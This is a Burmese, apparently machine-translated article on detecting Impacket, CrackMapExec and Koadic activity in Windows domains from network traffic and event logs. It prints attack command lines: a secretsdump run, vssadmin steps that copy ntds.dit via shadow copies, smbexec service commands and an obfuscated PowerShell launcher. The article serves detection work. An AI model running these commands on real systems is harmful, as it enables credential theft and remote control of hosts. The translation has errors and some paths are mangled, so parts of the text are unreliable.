Windows အခြေခံအဆောက်အအုံဆိုင်ရာ တိုက်ခိုက်မှုများကို ဘယ်လိုရှာဖွေနိုင်သလဲ- ဟက်ကာကိရိယာများကို လေ့လာခြင်း။

ကော်ပိုရိတ်ကဏ္ဍတွင် တိုက်ခိုက်မှုအရေအတွက်သည် နှစ်စဉ်တိုးလာနေသည်- ဥပမာ 2017 ခုနှစ်တွင် 13% ပိုမိုထူးခြားသောဖြစ်ရပ်များကိုမှတ်တမ်းတင်ခဲ့သည်။ 2016 နှင့် 2018 နှစ်ကုန်တွင် - 27% ပိုများတယ်။ယခင်ကာလများထက် အဓိကလုပ်ဆောင်သော tool မှာ Windows operating system ဖြစ်သည်။ 2017-2018 ခုနှစ်တွင် APT Dragonfly, APT28၊ APT MuddyWat ဥရောပ၊ မြောက်အမေရိကနှင့် ဆော်ဒီအာရေဗျတို့တွင် အစိုးရနှင့် စစ်ဘက်ဆိုင်ရာ အဖွဲ့အစည်းများကို တိုက်ခိုက်မှုများ ပြုလုပ်ခဲ့သည်။ ပြီးတော့ ဒီအတွက် tool သုံးခုကို ကျွန်တော်တို့ သုံးခဲ့တယ်- ထုပ်ပိုး, CrackMapExec и Koadic. ၎င်းတို့၏ အရင်းအမြစ်ကုဒ်ကို GitHub တွင် ဖွင့်ထားပြီး ရနိုင်ပါသည်။

ဤကိရိယာများကို ကနဦးထိုးဖောက်ခြင်းအတွက် အသုံးမချသော်လည်း အခြေခံအဆောက်အဦအတွင်း တိုက်ခိုက်မှုကို ဖွံ့ဖြိုးတိုးတက်စေရန်အတွက် သတိပြုသင့်သည်။ တိုက်ခိုက်သူများသည် ပတ်၀န်းကျင်ကို ထိုးဖောက်ဝင်ရောက်ပြီးနောက် တိုက်ခိုက်မှု၏ အဆင့်အမျိုးမျိုးတွင် ၎င်းတို့ကို အသုံးပြုကြသည်။ ဤနည်းအားဖြင့်၊ ၎င်းသည် ရှာဖွေရန်ခက်ခဲပြီး နည်းပညာအကူအညီဖြင့်သာ မကြာခဏဖြစ်သည်။ ကွန်ရက်အသွားအလာတွင် အပေးအယူလုပ်သည့်ခြေရာများကို ဖော်ထုတ်ခြင်း။ သို့မဟုတ် ခွင့်ပြုသောကိရိယာများ အခြေခံအဆောက်အဦကို ထိုးဖောက်ဝင်ရောက်ပြီးနောက် တိုက်ခိုက်သူ၏ တက်ကြွသော လုပ်ဆောင်ချက်များကို ရှာဖွေပါ။. ကိရိယာများသည် ဖိုင်များကို လွှဲပြောင်းခြင်းမှသည် registry နှင့် အပြန်အလှန် အပြန်အလှန် ဆက်သွယ်ခြင်းနှင့် အဝေးထိန်းစက်တစ်ခုရှိ ညွှန်ကြားချက်များကို လုပ်ဆောင်ခြင်းအထိ လုပ်ဆောင်မှုအမျိုးမျိုးကို ပေးစွမ်းသည်။ ၎င်းတို့၏ ကွန်ရက်လုပ်ဆောင်ချက်ကို ဆုံးဖြတ်ရန် ဤကိရိယာများကို ကျွန်ုပ်တို့ လေ့လာခဲ့ပါသည်။

ကျွန်ုပ်တို့ လုပ်ဆောင်ရန် လိုအပ်သည်-

• Hacking Tools များ မည်သို့အလုပ်လုပ်သည်ကို နားလည်ပါ။. တိုက်ခိုက်သူများသည် မည်သည့်နည်းပညာများကို အသုံးချရန် လိုအပ်သည်ကို ရှာဖွေပါ။
• တိုက်ခိုက်မှုတစ်ခု၏ပထမအဆင့်တွင် သတင်းအချက်အလက်လုံခြုံရေးကိရိယာများက မတွေ့နိုင်သောအရာကို ရှာဖွေပါ။. တိုက်ခိုက်သူသည် အတွင်းပိုင်းတိုက်ခိုက်သူဖြစ်သောကြောင့် သို့မဟုတ် တိုက်ခိုက်သူသည် ယခင်ကမသိခဲ့သော အခြေခံအဆောက်အအုံအတွင်းရှိ အပေါက်တစ်ခုကို အသုံးချနေသောကြောင့် ထောက်လှမ်းခြင်းအဆင့်ကို ကျော်သွားနိုင်သည်။ သူ၏ လုပ်ဆောင်ချက်များ၏ ကွင်းဆက်တစ်ခုလုံးကို ပြန်လည်ထူထောင်ရန် ဖြစ်လာနိုင်သောကြောင့် နောက်ထပ် လှုပ်ရှားမှုများကို ဖော်ထုတ်လိုစိတ် ဖြစ်လာသည်။
• ကျူးကျော်ဝင်ရောက်မှုရှာဖွေရေးကိရိယာများမှ မှားယွင်းသောအပြုသဘောများကို ဖယ်ရှားပါ။. ထောက်လှမ်းမှုတစ်ခုတည်းကိုအခြေခံ၍ အချို့သောလုပ်ဆောင်ချက်များကို တွေ့ရှိပါက မကြာခဏ အမှားအယွင်းများဖြစ်နိုင်သည်ကို မမေ့သင့်ပါ။ အများအားဖြင့် အခြေခံအဆောက်အအုံတွင် သတင်းအချက်အလက်များရရှိရန် ပထမတစ်ချက်တွင်တရားဝင်နည်းလမ်းများနှင့် ခွဲခြား၍မရသော လုံလောက်သောနည်းလမ်းများစွာရှိသည်။

ဒီကိရိယာတွေက တိုက်ခိုက်သူတွေကို ဘာပေးသလဲ။ ၎င်းသည် Impacket ဖြစ်ပါက၊ တိုက်ခိုက်သူများသည် ပတ်၀န်းကျင်ကို ချိုးဖျက်ပြီးနောက် တိုက်ခိုက်မှု၏ အဆင့်အမျိုးမျိုးတွင် အသုံးပြုနိုင်သည့် ကြီးမားသော မော်ဂျူးစာကြည့်တိုက်ကို ရရှိမည်ဖြစ်သည်။ ကိရိယာများစွာသည် Impacket module များကို အတွင်းပိုင်း၌ အသုံးပြုသည် - ဥပမာ၊ Metasploit။ ၎င်းတွင် အဝေးထိန်းအမိန့်ပေးလုပ်ဆောင်မှုအတွက် dcomexec နှင့် wmiexec ၊ Impacket မှထည့်သွင်းထားသော memory မှအကောင့်များရယူရန်အတွက် secretsdump ရှိသည်။ ရလဒ်အနေဖြင့်၊ ထိုသို့သော စာကြည့်တိုက်၏ လုပ်ဆောင်ချက်ကို မှန်ကန်သော ထောက်လှမ်းခြင်းမှ ဆင်းသက်လာမှုကို သိရှိနိုင်မည်ဖြစ်သည်။

ဖန်တီးသူများသည် CrackMapExec (သို့မဟုတ် ရိုးရိုး CME) အကြောင်း “Powed by Impacket” ရေးခဲ့သည်မှာ တိုက်ဆိုင်မှုမဟုတ်ပါ။ ထို့အပြင်၊ CME တွင် လူကြိုက်များသော အခြေအနေများအတွက် အဆင်သင့်ပြုလုပ်နိုင်သော လုပ်ဆောင်နိုင်စွမ်း ရှိသည်- စကားဝှက်များ သို့မဟုတ် ၎င်းတို့၏ hash များကို ရယူရန်အတွက် Mimikatz၊ အဝေးထိန်းစနစ်ဖြင့် ကွပ်မျက်မှုအတွက် Meterpreter သို့မဟုတ် Empire အေးဂျင့်ကို အကောင်အထည်ဖော်ခြင်းနှင့် သင်္ဘောပေါ်တွင် Bloodhound တို့ဖြစ်သည်။

ကျွန်ုပ်တို့ရွေးချယ်ခဲ့သော တတိယကိရိယာမှာ Koadic ဖြစ်သည်။ မကြာသေးမီက ၎င်းကို 25 ခုနှစ် နိုင်ငံတကာ ဟက်ကာကွန်ဖရင့် DEFCON 2017 တွင် တင်ပြခဲ့ပြီး စံမဟုတ်သော ချဉ်းကပ်မှုဖြင့် ခွဲခြားထားသည်- ၎င်းသည် HTTP၊ Java Script နှင့် Microsoft Visual Basic Script (VBS) မှတဆင့် အလုပ်လုပ်ပါသည်။ ဤချဉ်းကပ်နည်းကို living off land ဟုခေါ်သည်- tool သည် Windows တွင်တည်ဆောက်ထားသော မှီခိုမှုများနှင့် စာကြည့်တိုက်များကို အသုံးပြုသည်။ ဖန်တီးသူများသည် ၎င်းကို COM Command & Control သို့မဟုတ် C3 ဟုခေါ်သည်။

IMPACKET

Impacket ၏ လုပ်ဆောင်နိုင်စွမ်းသည် AD အတွင်း ကင်းထောက်ခြင်းနှင့် အတွင်းပိုင်း MS SQL ဆာဗာများမှ ဒေတာများ စုဆောင်းခြင်း၊ အထောက်အထားများ ရယူခြင်းဆိုင်ရာ နည်းပညာများအထိ ကျယ်ပြန့်သည်- ဤသည်မှာ SMB ထပ်ဆင့်တိုက်ခိုက်မှုနှင့် domain controller မှ သုံးစွဲသူ စကားဝှက်များ ဟက်ရှ်များပါရှိသော ntds.dit ဖိုင်ကို ရယူခြင်း ဖြစ်သည်။ Impacket သည် မတူညီသောနည်းလမ်းလေးမျိုးဖြင့် WMI၊ Windows Scheduler Management Service၊ DCOM နှင့် SMB တို့ကို အသုံးပြုပြီး အဝေးမှ ညွှန်ကြားချက်များကို လုပ်ဆောင်ပြီး အထောက်အထားများ လိုအပ်ပါသည်။

လျှို့ဝှက်ချက်များ

လျှို့ဝှက်ချက်တွေကို လေ့လာကြည့်ရအောင်။ ၎င်းသည် အသုံးပြုသူစက်များနှင့် ဒိုမိန်းထိန်းချုပ်သူများ နှစ်မျိုးလုံးကို ပစ်မှတ်ထားနိုင်သည့် မော်ဂျူးတစ်ခုဖြစ်သည်။ မမ်မိုရီဧရိယာ LSA၊ SAM၊ SECURITY၊ NTDS.dit မိတ္တူများကို ရယူရန် အသုံးပြုနိုင်ပြီး၊ ထို့ကြောင့် တိုက်ခိုက်မှု၏ အဆင့်အမျိုးမျိုးတွင် မြင်တွေ့နိုင်သည်။ Module ၏လုပ်ဆောင်မှုတွင် ပထမအဆင့်မှာ Pass the Hash တိုက်ခိုက်မှုကို အလိုအလျောက်လုပ်ဆောင်ရန် အသုံးပြုသူ၏စကားဝှက် သို့မဟုတ် ၎င်း၏ hash တစ်ခုခုလိုအပ်သော SMB မှတစ်ဆင့် စစ်မှန်ကြောင်းအထောက်အထားပြခြင်းဖြစ်သည်။ ဝန်ဆောင်မှုထိန်းချုပ်မှုမန်နေဂျာ (SCM) သို့ဝင်ရောက်ခွင့်ကိုဖွင့်ရန် တောင်းဆိုချက်တစ်ခုထွက်ပေါ်လာပြီး တိုက်ခိုက်သူသည် စိတ်ပါဝင်စားသောအကိုင်းအခက်များ၏ဒေတာကိုရှာဖွေနိုင်ပြီး SMB မှတစ်ဆင့်ရလဒ်များကိုရယူအသုံးပြုကာ winreg ပရိုတိုကောမှတစ်ဆင့် မှတ်ပုံတင်ခြင်းသို့ဝင်ရောက်ခွင့်ရရှိရန် တောင်းဆိုချက်တစ်ခုထွက်ပေါ်လာသည်။

ပုံတွင်။ 1 winreg ပရိုတိုကောကို အသုံးပြုသောအခါ၊ LSA ဖြင့် registry key ကိုအသုံးပြု၍ ဝင်ရောက်ခွင့်ကို မည်သို့မည်ပုံရရှိသည်ကို ကျွန်ုပ်တို့ မြင်တွေ့ရသည်။ ဒါကိုလုပ်ဖို့၊ opcode 15 - OpenKey နဲ့ DCERPC အမိန့်ကို သုံးပါ။

ထမင်း။ 1. winreg protocol ကို အသုံးပြု၍ registry key ကိုဖွင့်ပါ။

ထို့နောက်၊ သော့ကိုဝင်ရောက်ခွင့်ရသောအခါ၊ တန်ဖိုးများကို opcode 20 ဖြင့် SaveKey အမိန့်ဖြင့် သိမ်းဆည်းသည်။ Impacket သည် ၎င်းကို အလွန်တိကျသောနည်းလမ်းဖြင့် လုပ်ဆောင်သည်။ ၎င်းသည် .tmp ဖြင့် ထည့်ထားသော ကျပန်းစာလုံး 8 လုံးပါသော ဖိုင်တစ်ခုတွင် တန်ဖိုးများကို သိမ်းဆည်းသည်။ ထို့အပြင်၊ ဤဖိုင်၏ နောက်ထပ်အပ်လုဒ်သည် System32 လမ်းညွှန်မှ SMB မှတစ်ဆင့် ဖြစ်ပေါ်ပါသည်။

ထမင်း။ 2. အဝေးထိန်းစက်မှ registry သော့ကို ရယူရန် အစီအစဉ်

winreg ပရိုတိုကော၊ သီးခြားအမည်များ၊ ညွှန်ကြားချက်များနှင့် ၎င်းတို့၏အမှာစာများကို အသုံးပြု၍ အချို့သော registry ဌာနခွဲများသို့ စုံစမ်းမေးမြန်းခြင်းဖြင့် ကွန်ရက်ပေါ်ရှိ ထိုကဲ့သို့သောလုပ်ဆောင်ချက်ကို ရှာဖွေတွေ့ရှိနိုင်ပါသည်။

ဤ module သည် Windows event log တွင် ခြေရာခံများကို ထားခဲ့၍ ရှာဖွေရလွယ်ကူစေသည်။ ဥပမာအားဖြင့်၊ command ကိုလုပ်ဆောင်ခြင်း၏ရလဒ်အဖြစ်

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Windows Server 2016 မှတ်တမ်းတွင် အောက်ပါဖြစ်ရပ်များ၏ သော့တွဲကို ကျွန်ုပ်တို့မြင်ရပါမည်-

1. 4624 - အဝေးမှ Logon ။
2. 5145 - winreg အဝေးထိန်းဝန်ဆောင်မှုသို့ ဝင်ရောက်ခွင့်ကို စစ်ဆေးခြင်း။
3. 5145 - System32 လမ်းညွှန်တွင် ဖိုင်ဝင်ရောက်ခွင့်အခွင့်အရေးများကို စစ်ဆေးခြင်း။ ဖိုင်တွင် အထက်ဖော်ပြပါ ကျပန်းအမည်ပါရှိသည်။
4. 4688 - vssadmin ကိုဖွင့်သည့် cmd.exe လုပ်ငန်းစဉ်ကို ဖန်တီးခြင်း-

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - command ဖြင့် လုပ်ငန်းစဉ်တစ်ခု ဖန်တီးခြင်း-

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - command ဖြင့် လုပ်ငန်းစဉ်တစ်ခု ဖန်တီးခြင်း-

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - command ဖြင့် လုပ်ငန်းစဉ်တစ်ခု ဖန်တီးခြင်း-

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

Post-exploitation tools များကဲ့သို့ပင်၊ Impacket တွင် အဝေးမှ command များကို လုပ်ဆောင်ရန်အတွက် module များရှိသည်။ ကျွန်ုပ်တို့သည် အဝေးထိန်းစက်တွင် အပြန်အလှန်အကျိုးပြုသည့် command shell ကိုပေးဆောင်သည့် smbexec ကိုအာရုံစိုက်ပါမည်။ ဤ module သည် စကားဝှက် သို့မဟုတ် စကားဝှက် hash ဖြင့်ဖြစ်စေ SMB မှတစ်ဆင့် စစ်မှန်ကြောင်းအထောက်အထားပြရန်လည်း လိုအပ်ပါသည်။ ပုံတွင်။ ပုံ 3 တွင်ထိုကဲ့သို့သောကိရိယာအလုပ်လုပ်ပုံဥပမာတစ်ခုကိုကျွန်ုပ်တို့တွေ့မြင်ရသည်၊ ဤအခြေအနေတွင်၎င်းသည်ဒေသခံစီမံခန့်ခွဲသူကွန်ဆိုးလ်ဖြစ်သည်။

ထမင်း။ 3. အပြန်အလှန်အကျိုးပြုသော smbexec ကွန်ဆိုးလ်

စစ်မှန်ကြောင်းအထောက်အထားပြပြီးနောက် smbexec ၏ပထမအဆင့်မှာ OpenSCManagerW command (15) ဖြင့် SCM ကိုဖွင့်ရန်ဖြစ်သည်။ မေးခွန်းသည် မှတ်သားဖွယ်ဖြစ်သည်- စက်အမည်အကွက်သည် DUMMY ဖြစ်သည်။

ထမင်း။ 4. Service Control Manager ကိုဖွင့်ရန် တောင်းဆိုပါ။

ထို့နောက် ဝန်ဆောင်မှုကို CreateServiceW command (12) ကို အသုံးပြု၍ ဖန်တီးသည်။ smbexec ကိစ္စတွင်၊ အချိန်တိုင်းတွင် တူညီသော command တည်ဆောက်မှု logic ကို တွေ့နိုင်ပါသည်။ ပုံတွင်။ 5 အစိမ်းရောင်သည် မပြောင်းလဲနိုင်သော အမိန့်ပေးသတ်မှတ်ချက်များကို ညွှန်ပြသည်၊ အဝါရောင်သည် တိုက်ခိုက်သူအား ပြောင်းလဲနိုင်သည့်အရာကို ညွှန်ပြသည်။ executable file ၏အမည်၊ ၎င်း၏ directory နှင့် output ဖိုင်ကို ပြောင်းလဲနိုင်သည်ကို သိမြင်ရန်မှာ လွယ်ကူသော်လည်း ကျန်သည် Impacket module ၏ ယုတ္တိကို မထိခိုက်စေဘဲ ပြောင်းလဲရန် ပိုမိုခက်ခဲပါသည်။

ထမင်း။ 5. Service Control Manager ကိုအသုံးပြု၍ ဝန်ဆောင်မှုတစ်ခုဖန်တီးရန် တောင်းဆိုခြင်း။

Smbexec သည် Windows event log တွင် သိသာထင်ရှားသော ခြေရာများကို ချန်ထားခဲ့သည် ။ ipconfig command ဖြင့် အပြန်အလှန်အကျိုးသက်ရောက်သော command shell အတွက် Windows Server 2016 မှတ်တမ်းတွင်၊ အောက်ပါ ဖြစ်ရပ်များ၏ အဓိက အစီအစဥ်ကို ကျွန်ုပ်တို့ မြင်ရပါမည်။

1. 4697 — သားကောင်၏စက်တွင် ဝန်ဆောင်မှုတပ်ဆင်ခြင်း-

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - အမှတ် 1 မှ အကြောင်းပြချက်များဖြင့် cmd.exe လုပ်ငန်းစဉ်ကို ဖန်တီးခြင်း။
3. 5145 - C$ directory ရှိ __output ဖိုင်သို့ ဝင်ရောက်ခွင့်ကို စစ်ဆေးခြင်း။
4. 4697 — သားကောင်၏စက်တွင် ဝန်ဆောင်မှုတပ်ဆင်ခြင်း။

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - အမှတ် 4 မှ အကြောင်းပြချက်များဖြင့် cmd.exe လုပ်ငန်းစဉ်ကို ဖန်တီးခြင်း။
6. 5145 - C$ directory ရှိ __output ဖိုင်သို့ ဝင်ရောက်ခွင့်ကို စစ်ဆေးခြင်း။

Impacket သည် တိုက်ခိုက်ရေးကိရိယာများ ဖွံ့ဖြိုးတိုးတက်မှုအတွက် အခြေခံဖြစ်သည်။ ၎င်းသည် Windows အခြေခံအဆောက်အအုံရှိ ပရိုတိုကောအားလုံးနီးပါးကို ပံ့ပိုးပေးပြီး တစ်ချိန်တည်းတွင် ၎င်း၏ကိုယ်ပိုင်လက္ခဏာအင်္ဂါရပ်များရှိသည်။ ဤတွင် တိကျသော winreg တောင်းဆိုမှုများ၊ နှင့် SCM API ကို အင်္ဂါရပ် ကွပ်ကဲမှုဖွဲ့စည်းခြင်း၊ ဖိုင်အမည်ဖော်မတ် နှင့် SMB မျှဝေခြင်း SYSTEM32 တို့ပါရှိသည်။

CRACKMAPEXEC

CME ကိရိယာသည် ကွန်ရက်အတွင်း တိုးတက်စေရန် တိုက်ခိုက်သူလုပ်ဆောင်ရမည့် ပုံမှန်လုပ်ဆောင်မှုများကို အလိုအလျောက်လုပ်ဆောင်ရန် အဓိကအားဖြင့် ဒီဇိုင်းထုတ်ထားသည်။ ၎င်းသည် သင့်အား နာမည်ကြီး အင်ပါယာအေးဂျင့်နှင့် Meterpreter တို့နှင့် တွဲဖက်လုပ်ဆောင်နိုင်စေပါသည်။ အမိန့်များကို လျှို့ဝှက်လုပ်ဆောင်ရန်အတွက် CME သည် ၎င်းတို့ကို ရှုပ်ထွေးစေနိုင်သည်။ Bloodhound (သီးခြား ထောက်လှမ်းရေး ကိရိယာ) ကို အသုံးပြု၍ တိုက်ခိုက်သူသည် တက်ကြွသော ဒိုမိန်း စီမံခန့်ခွဲသူ အပိုင်းအတွက် ရှာဖွေမှုကို အလိုအလျောက် လုပ်ဆောင်နိုင်သည်။

သွေးထွက်သံယို

Bloodhound သည် သီးခြားကိရိယာတစ်ခုအနေဖြင့် ကွန်ရက်အတွင်း အဆင့်မြင့်ထောက်လှမ်းမှုကို ခွင့်ပြုသည်။ ၎င်းသည် အသုံးပြုသူများ၊ စက်များ၊ အုပ်စုများ၊ စက်ရှင်များအကြောင်း အချက်အလက်များကို စုဆောင်းပြီး PowerShell script သို့မဟုတ် binary ဖိုင်အဖြစ် ပံ့ပိုးပေးပါသည်။ အချက်အလက်စုဆောင်းရန် LDAP သို့မဟုတ် SMB အခြေခံ ပရိုတိုကောများကို အသုံးပြုသည်။ CME ပေါင်းစည်းမှု module သည် Bloodhound ကို သားကောင်၏စက်သို့ ဒေါင်းလုဒ်လုပ်ရန်၊ ကွပ်မျက်ပြီးနောက် စုဆောင်းထားသောဒေတာကို လည်ပတ်ရန်နှင့် လက်ခံရန်၊ စနစ်အတွင်းရှိ လုပ်ဆောင်ချက်များကို အလိုအလျောက်လုပ်ဆောင်စေပြီး ၎င်းတို့ကို သိသာထင်ရှားစေသည်။ Bloodhound graphical shell သည် စုဆောင်းထားသောဒေတာများကို ဂရပ်ပုံစံဖြင့်တင်ပြသည်၊ ၎င်းသည် တိုက်ခိုက်သူ၏စက်မှ ဒိုမိန်းစီမံခန့်ခွဲသူထံသို့ အတိုဆုံးလမ်းကြောင်းကိုရှာဖွေနိုင်စေပါသည်။

ထမင်း။ 6. Bloodhound Interface

သားကောင်၏စက်တွင်လည်ပတ်ရန်၊ မော်ဂျူးသည် ATSVC နှင့် SMB ကို အသုံးပြု၍ လုပ်ဆောင်စရာတစ်ခုကို ဖန်တီးသည်။ ATSVC သည် Windows Task Scheduler နှင့် လုပ်ဆောင်ရန်အတွက် အင်တာဖေ့စ်တစ်ခုဖြစ်သည်။ CME သည် ကွန်ရက်ပေါ်တွင် လုပ်ဆောင်စရာများကို ဖန်တီးရန် ၎င်း၏ NetrJobAdd(1) လုပ်ဆောင်ချက်ကို အသုံးပြုသည်။ CME module မှ ပေးပို့သည့် ဥပမာကို ပုံတွင် ပြထားသည်။ 7- ၎င်းသည် XML ဖော်မတ်ရှိ အကြောင်းပြချက်များ၏ ပုံစံဖြင့် cmd.exe ခေါ်ဆိုမှုနှင့် ရှုပ်ထွေးသောကုဒ်တစ်ခုဖြစ်သည်။

ပုံ.၇။ CME မှတစ်ဆင့် လုပ်ဆောင်စရာတစ်ခုကို ဖန်တီးခြင်း။

တာဝန်ကို ကွပ်မျက်ရန်အတွက် တင်သွင်းပြီးနောက်၊ သားကောင်၏ စက်သည် Bloodhound ကိုယ်တိုင် စတင်ပြီး ၎င်းကို အသွားအလာတွင် တွေ့မြင်နိုင်သည်။ စံပြအုပ်စုများ၊ ဒိုမိန်းအတွင်းရှိ စက်များနှင့် အသုံးပြုသူများစာရင်းကို ရယူရန် LDAP စုံစမ်းမေးမြန်းမှုများဖြင့် ခွဲခြားသတ်မှတ်ထားပြီး SRVSVC NetSessEnum တောင်းဆိုမှုမှတစ်ဆင့် အသက်ဝင်သောအသုံးပြုသူအစည်းအဝေးများအကြောင်း အချက်အလက်များရယူပါ။

ထမင်း။ 8. SMB မှတစ်ဆင့် တက်ကြွသောအစည်းအဝေးများစာရင်းကို ရယူခြင်း။

ထို့အပြင်၊ စာရင်းစစ်ဖွင့်ထားခြင်းဖြင့် သားကောင်၏စက်တွင် Bloodhound ကို စတင်ခြင်းသည် ID 4688 (လုပ်ငန်းစဉ်ဖန်တီးမှု) နှင့် လုပ်ငန်းစဉ်အမည်ပါသည့် ဖြစ်ရပ်တစ်ခုဖြင့် လိုက်ပါသွားပါသည်။ «C:WindowsSystem32cmd.exe». ၎င်းနှင့်ပတ်သက်သော မှတ်သားဖွယ်အချက်မှာ command line arguments များဖြစ်သည် ။

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_av ထုတ်ကုန်များ

enum_avproducts module သည် လုပ်ဆောင်နိုင်စွမ်းနှင့် အကောင်အထည်ဖော်မှု၏ရှုထောင့်မှ အလွန်စိတ်ဝင်စားစရာကောင်းပါသည်။ WMI သည် သင့်အား WQL query language ကို အသုံးပြုရန် ခွင့်ပြုထားပြီး၊ ၎င်းသည် ဤ CME module ၏ မရှိမဖြစ်လိုအပ်သော အရာဖြစ်သည် ၎င်းသည် သားကောင်၏စက်တွင် တပ်ဆင်ထားသည့် အကာအကွယ်ကိရိယာများအကြောင်း AntiSpywareProduct နှင့် AntiМirusProduct အတန်းများသို့ မေးမြန်းမှုများကို ထုတ်ပေးသည်။ လိုအပ်သောဒေတာကိုရယူရန်အတွက်၊ မော်ဂျူးသည် rootSecurityCenter2 namespace သို့ချိတ်ဆက်ပြီး၊ ထို့နောက် WQL မေးခွန်းတစ်ခုထုတ်ပေးပြီး တုံ့ပြန်မှုကိုလက်ခံသည်။ ပုံတွင်။ ပုံ 9 သည် ထိုသို့သော တောင်းဆိုချက်များနှင့် တုံ့ပြန်မှုများ၏ အကြောင်းအရာများကို ပြထားသည်။ ကျွန်ုပ်တို့၏ဥပမာတွင် Windows Defender ကိုတွေ့ရှိခဲ့သည်။

ထမင်း။ 9. enum_avproducts module ၏ ကွန်ရက်လုပ်ဆောင်ချက်

မကြာခဏ WMI စစ်ဆေးမှု (Trace WMI-Activity) သည် WQL စုံစမ်းမှုများနှင့်ပတ်သက်သော အသုံးဝင်သောအချက်အလက်များကို သင်ရှာဖွေနိုင်သည့် ဖြစ်ရပ်များတွင် ပိတ်ထားနိုင်သည်။ သို့သော် ၎င်းကိုဖွင့်ထားလျှင် enum_avproducts script ကို run ပါက ID 11 ပါသောဖြစ်ရပ်ကို သိမ်းဆည်းမည်ဖြစ်သည်။ ၎င်းတွင် တောင်းဆိုချက်ပေးပို့သောအသုံးပြုသူအမည်နှင့် rootSecurityCenter2 namespace တွင်အမည်ပါရှိသည်။

CME မော်ဂျူးတစ်ခုစီတွင် LDAP နှင့် SMB ရှိ Bloodhound-specific လုပ်ဆောင်ချက်ပါရှိသော အလုပ်ချိန်ဇယားစနစ်တွင် သတ်မှတ်ထားသော WQL မေးမြန်းမှုများ သို့မဟုတ် အလုပ်အမျိုးအစားတစ်ခုဖန်တီးခြင်းပဲဖြစ်ဖြစ်၊ LDAP နှင့် SMB ရှိ Bloodhound-specific လုပ်ဆောင်ချက်ပါရှိသော CME module တစ်ခုစီတွင် ၎င်း၏ကိုယ်ပိုင်လက်ရာများရှိသည်။

KOADIC

Koadic ၏ထူးခြားသောအင်္ဂါရပ်မှာ Windows တွင်တည်ဆောက်ထားသော JavaScript နှင့် VBScript စကားပြန်များကိုအသုံးပြုခြင်းဖြစ်သည်။ ဤသဘောအရ၊ ၎င်းသည် ပြင်ပအားကိုးမှုမရှိဘဲ ပုံမှန် Windows ကိရိယာများကို အသုံးပြု၍ မြေယာလမ်းကြောင်းကို လိုက်လျောညီထွေဖြစ်စေသည်။ ရောဂါပိုးကူးစက်ပြီးနောက် စက်ပေါ်တွင် "implant" ကို တပ်ဆင်ထားသောကြောင့် ထိန်းချုပ်နိုင်စေမည့် Command & Control (CnC) အပြည့်အစုံအတွက် ကိရိယာတစ်ခုဖြစ်သည်။ Koadic ဝေါဟာရအရ ထိုကဲ့သို့သောစက်ကို "ဖုတ်ကောင်" ဟုခေါ်သည်။ သားကောင်၏ဘက်တွင် အပြည့်အဝလည်ပတ်ရန်အတွက် အခွင့်အရေးများ မလုံလောက်ပါက၊ Koadic သည် User Account Control bypass (UAC bypass) နည်းပညာများကို အသုံးပြု၍ ၎င်းတို့ကို မြှင့်တင်နိုင်မည်ဖြစ်သည်။

ထမင်း။ 10. Koadic Shell

သားကောင်သည် Command & Control ဆာဗာနှင့် ဆက်သွယ်မှု စတင်ရပါမည်။ ၎င်းကိုလုပ်ဆောင်ရန်၊ သူမသည် ယခင်ပြင်ဆင်ထားသည့် URI ကိုဆက်သွယ်ပြီး stagers များထဲမှတစ်ခုကိုအသုံးပြု၍ ပင်မ Koadic ကိုယ်ထည်ကိုရယူရန်လိုအပ်သည်။ ပုံတွင်။ ပုံ 11 သည် mshta stager အတွက် ဥပမာတစ်ခုပြသည်။

ထမင်း။ 11. CnC ဆာဗာဖြင့် စက်ရှင်တစ်ခုကို စတင်ခြင်း။

